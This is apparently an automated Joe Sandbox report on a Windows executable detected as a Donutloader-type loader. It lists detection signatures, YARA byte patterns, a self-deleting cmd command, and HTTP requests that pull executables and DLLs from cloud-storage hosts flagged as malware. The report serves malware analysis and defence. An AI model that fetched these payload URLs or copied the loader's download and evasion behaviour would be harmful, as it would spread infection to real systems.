Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LisectAVT_2403002B_185.exe

Overview

General Information

Sample name:LisectAVT_2403002B_185.exe
Analysis ID:1482004
MD5:0aafd40537a281b281bd85efcb2c976b
SHA1:d9b7aa59133586c9f885899b0483117500460036
SHA256:89daf7a9b800a5d38cf93accc70b5f24568aa65353e2c1b44199159a8cf888fb
Tags:exe
Infos:

Detection

Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Reads the Security eventlog
Reads the System eventlog
Self deletion via cmd or bat file
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: PSScriptPolicyTest Creation By Uncommon Process
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • LisectAVT_2403002B_185.exe (PID: 5780 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002B_185.exe" MD5: 0AAFD40537A281B281BD85EFCB2C976B)
    • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5456 cmdline: "C:\Windows\System32\cmd.exe" /c del /q C:\Users\user\Desktop\LisectAVT_2403002B_185.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x241304:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x244af6:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Program Files (x86)\Everything\4.binWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\qd[1].binWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000003.2552378256.0000000000D28000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3e08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x733e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2552254239.00000000036C0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x3f08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49
  • 0x743e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

System Summary

barindex
Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\LisectAVT_2403002B_185.exe, ProcessId: 5780, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2mss2rbn.cnk.ps1
No Snort rule has matched
Timestamp:2024-07-25T17:09:35.079831+0200
SID:2011803
Source Port:443
Destination Port:49715
Protocol:TCP
Classtype:Executable code was detected
Timestamp:2024-07-25T17:09:27.110663+0200
SID:2018581
Source Port:49714
Destination Port:443
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:10:08.423363+0200
SID:2022930
Source Port:443
Destination Port:61610
Protocol:TCP
Classtype:A Network Trojan was detected
Timestamp:2024-07-25T17:09:39.774044+0200
SID:2022930
Source Port:443
Destination Port:49716
Protocol:TCP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: LisectAVT_2403002B_185.exeAvira: detected
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/Avira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllUAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/TiwAvira URL Cloud: Label: malware
Source: https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/zf_cef.dllAvira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.3% probability
Source: LisectAVT_2403002B_185.exeJoe Sandbox ML: detected
Source: LisectAVT_2403002B_185.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknownHTTPS traffic detected: 82.156.94.48:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 82.156.94.47:443 -> 192.168.2.5:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.153.232.152:443 -> 192.168.2.5:49723 version: TLS 1.2
Source: LisectAVT_2403002B_185.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: G:\Jenkins_MusicBoxWorkPrjCode\MusicBox_PUBLIC_RELESE_20-10-09_9.1.1.3\code\KwResource\bin\Release\pdb\KwTools.pdb source: LisectAVT_2403002B_185.exe
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005FEBE2 FindFirstFileExW,0_2_005FEBE2
Source: Joe Sandbox ViewIP Address: 43.153.232.152 43.153.232.152
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /zf_cef.dll HTTP/1.1User-Agent: Mozilla/5.0Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_185.exeCode function: 0_2_005E3240 Sleep,InternetOpenA,InternetOpenUrlA,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,fpos,fpos,fpos,VirtualAlloc,fpos,VirtualFree,0_2_005E3240
Source: global trafficHTTP traffic detected: GET /1.exe HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcr120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /msvcp120.dll HTTP/1.1User-Agent: Mozilla/5.0Host: kdll-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /zf_cef.dll HTTP/1.1User-Agent: Mozilla/5.0Host: leisuretrade-1323571269.cos.ap-beijing.myqcloud.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /qd.bin HTTP/1.1User-Agent: loaderHost: wwwqd-1323571269.cos.ap-singapore.myqcloud.comCache-Control: no-cache
Source: global trafficDNS traffic detected: DNS query: kdll-1323571269.cos.ap-beijing.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: leisuretrade-1323571269.cos.ap-beijing.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: wwwqd-1323571269.cos.ap-singapore.myqcloud.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: application/xmlContent-Length: 423Connection: closeDate: Thu, 25 Jul 2024 15:09:26 GMTServer: tencent-cosx-cos-request-id: NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/gs/gscodesigng3.crl0
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://crl.globalsign.com/root.crl0Y
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2627778324.0000000006D4C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2551591777.0000000006D4C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2552579751.0000000006D4C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2540678118.0000000006D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: zf_cef.dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ocsp.thawte.com0
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp2.globalsign.com/gscodesigng30V
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2420936425.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221215701.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcd.com06
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2420936425.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221215701.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://s.symcd.com0_
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://secure.globalsign.com/cacert/gscodesigng3ocsp.crt04
Source: LisectAVT_2403002B_185.exeString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://sw.symcb.com/sw.crl0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://sw.symcd.com0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.syma
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2453356281.0000000000D18000.00000004.00000020.00020000.00000000.sdmp, zf_cef[1].dll.0.dr, zf_cef.dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2624315548.00000000049B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2420936425.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221215701.0000000000CC7000.00000004.00000020.00020000.00000000.sdmp, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0)
Source: LisectAVT_2403002B_185.exe, msvcr120[1].dll.0.dr, msvcp120.dll.0.dr, msvcp120[1].dll.0.dr, msvcr120.dll.0.drString found in binary or memory: https://d.symcb.com/rpa0.
Source: LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2522556870.0000000004115000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beiji
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijiQ-mw.
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/&
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2420936425.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2104752093.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2284874201.0000000000CD3000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000C4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/1.exe
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/100
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/200023
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/C
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2221390419.0000000000D0D000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2221305862.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/D
Source: LisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CBB000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dll
